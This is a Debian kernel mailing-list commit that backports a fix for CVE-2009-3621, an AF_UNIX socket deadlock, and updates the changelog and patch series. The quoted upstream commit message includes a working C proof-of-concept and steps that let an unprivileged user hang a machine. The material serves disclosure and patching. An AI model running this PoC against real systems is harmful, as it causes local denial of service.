[kernel] r14577 - in dists/etch-security/linux-2.6/debian: . patches/bugfix/all patches/series

Dann Frazier dannf at alioth.debian.org
Thu Nov 5 03:29:01 UTC 2009 

Author: dannf
Date: Thu Nov  5 03:28:58 2009
New Revision: 14577

Log:
AF_UNIX: Fix deadlock on connecting to shutdown socket (CVE-2009-3621)

Added:
   dists/etch-security/linux-2.6/debian/patches/bugfix/all/af_unix-fix-deadlock-on-connecting-to-shutdown-socket.patch
      - copied unchanged from r14564, dists/etch-security/linux-2.6.24/debian/patches/bugfix/all/af_unix-fix-deadlock-on-connecting-to-shutdown-socket.patch
Modified:
   dists/etch-security/linux-2.6/debian/changelog
   dists/etch-security/linux-2.6/debian/patches/series/26etch1

Modified: dists/etch-security/linux-2.6/debian/changelog
==============================================================================
--- dists/etch-security/linux-2.6/debian/changelog	Thu Nov  5 03:21:09 2009	(r14576)
+++ dists/etch-security/linux-2.6/debian/changelog	Thu Nov  5 03:28:58 2009	(r14577)
@@ -11,6 +11,7 @@
     struct nfsd4_open out of the union (CVE-2009-3286)
   * fs: pipe.c null pointer dereference (CVE-2009-3547)
   * netlink: fix typo in initialization (CVE-2009-3612)
+  * AF_UNIX: Fix deadlock on connecting to shutdown socket (CVE-2009-3621)
 
  -- dann frazier <dannf at debian.org>  Tue, 15 Sep 2009 22:19:58 -0600
 

Copied: dists/etch-security/linux-2.6/debian/patches/bugfix/all/af_unix-fix-deadlock-on-connecting-to-shutdown-socket.patch (from r14564, dists/etch-security/linux-2.6.24/debian/patches/bugfix/all/af_unix-fix-deadlock-on-connecting-to-shutdown-socket.patch)
==============================================================================
--- /dev/null	00:00:00 1970	(empty, because file is newly added)
+++ dists/etch-security/linux-2.6/debian/patches/bugfix/all/af_unix-fix-deadlock-on-connecting-to-shutdown-socket.patch	Thu Nov  5 03:28:58 2009	(r14577, copy of r14564, dists/etch-security/linux-2.6.24/debian/patches/bugfix/all/af_unix-fix-deadlock-on-connecting-to-shutdown-socket.patch)
@@ -0,0 +1,84 @@
+commit 77238f2b942b38ab4e7f3aced44084493e4a8675
+Author: Tomoki Sekiyama <tomoki.sekiyama.qu at hitachi.com>
+Date:   Sun Oct 18 23:17:37 2009 -0700
+
+    AF_UNIX: Fix deadlock on connecting to shutdown socket
+    
+    I found a deadlock bug in UNIX domain socket, which makes able to DoS
+    attack against the local machine by non-root users.
+    
+    How to reproduce:
+    1. Make a listening AF_UNIX/SOCK_STREAM socket with an abstruct
+        namespace(*), and shutdown(2) it.
+     2. Repeat connect(2)ing to the listening socket from the other sockets
+        until the connection backlog is full-filled.
+     3. connect(2) takes the CPU forever. If every core is taken, the
+        system hangs.
+    
+    PoC code: (Run as many times as cores on SMP machines.)
+    
+    int main(void)
+    {
+    	int ret;
+    	int csd;
+    	int lsd;
+    	struct sockaddr_un sun;
+    
+    	/* make an abstruct name address (*) */
+    	memset(&sun, 0, sizeof(sun));
+    	sun.sun_family = PF_UNIX;
+    	sprintf(&sun.sun_path[1], "%d", getpid());
+    
+    	/* create the listening socket and shutdown */
+    	lsd = socket(AF_UNIX, SOCK_STREAM, 0);
+    	bind(lsd, (struct sockaddr *)&sun, sizeof(sun));
+    	listen(lsd, 1);
+    	shutdown(lsd, SHUT_RDWR);
+    
+    	/* connect loop */
+    	alarm(15); /* forcely exit the loop after 15 sec */
+    	for (;;) {
+    		csd = socket(AF_UNIX, SOCK_STREAM, 0);
+    		ret = connect(csd, (struct sockaddr *)&sun, sizeof(sun));
+    		if (-1 == ret) {
+    			perror("connect()");
+    			break;
+    		}
+    		puts("Connection OK");
+    	}
+    	return 0;
+    }
+    
+    (*) Make sun_path[0] = 0 to use the abstruct namespace.
+        If a file-based socket is used, the system doesn't deadlock because
+        of context switches in the file system layer.
+    
+    Why this happens:
+     Error checks between unix_socket_connect() and unix_wait_for_peer() are
+     inconsistent. The former calls the latter to wait until the backlog is
+     processed. Despite the latter returns without doing anything when the
+     socket is shutdown, the former doesn't check the shutdown state and
+     just retries calling the latter forever.
+    
+    Patch:
+     The patch below adds shutdown check into unix_socket_connect(), so
+     connect(2) to the shutdown socket will return -ECONREFUSED.
+    
+    Signed-off-by: Tomoki Sekiyama <tomoki.sekiyama.qu at hitachi.com>
+    Signed-off-by: Masanori Yoshida <masanori.yoshida.tv at hitachi.com>
+    Signed-off-by: David S. Miller <davem at davemloft.net>
+
+Adjusted to apply to Debian's 2.6.24 by dann frazier <dannf at debian.org>
+
+diff -urpN linux-source-2.6.24.orig/net/unix/af_unix.c linux-source-2.6.24/net/unix/af_unix.c
+--- linux-source-2.6.24.orig/net/unix/af_unix.c	2008-01-24 15:58:37.000000000 -0700
++++ linux-source-2.6.24/net/unix/af_unix.c	2009-11-04 13:05:18.000000000 -0700
+@@ -1071,6 +1071,8 @@ restart:
+ 	err = -ECONNREFUSED;
+ 	if (other->sk_state != TCP_LISTEN)
+ 		goto out_unlock;
++	if (other->sk_shutdown & RCV_SHUTDOWN)
++		goto out_unlock;
+ 
+ 	if (skb_queue_len(&other->sk_receive_queue) >
+ 	    other->sk_max_ack_backlog) {

Modified: dists/etch-security/linux-2.6/debian/patches/series/26etch1
==============================================================================
--- dists/etch-security/linux-2.6/debian/patches/series/26etch1	Thu Nov  5 03:21:09 2009	(r14576)
+++ dists/etch-security/linux-2.6/debian/patches/series/26etch1	Thu Nov  5 03:28:58 2009	(r14577)
@@ -12,3 +12,4 @@
 + bugfix/all/nfsd4-de-union-iattr-and-verf.patch
 + bugfix/all/fs-pipe-null-pointer-dereference.patch
 + bugfix/all/netlink-fix-typo-in-initialization.patch
++ bugfix/all/af_unix-fix-deadlock-on-connecting-to-shutdown-socket.patch

More information about the Kernel-svn-changes mailing list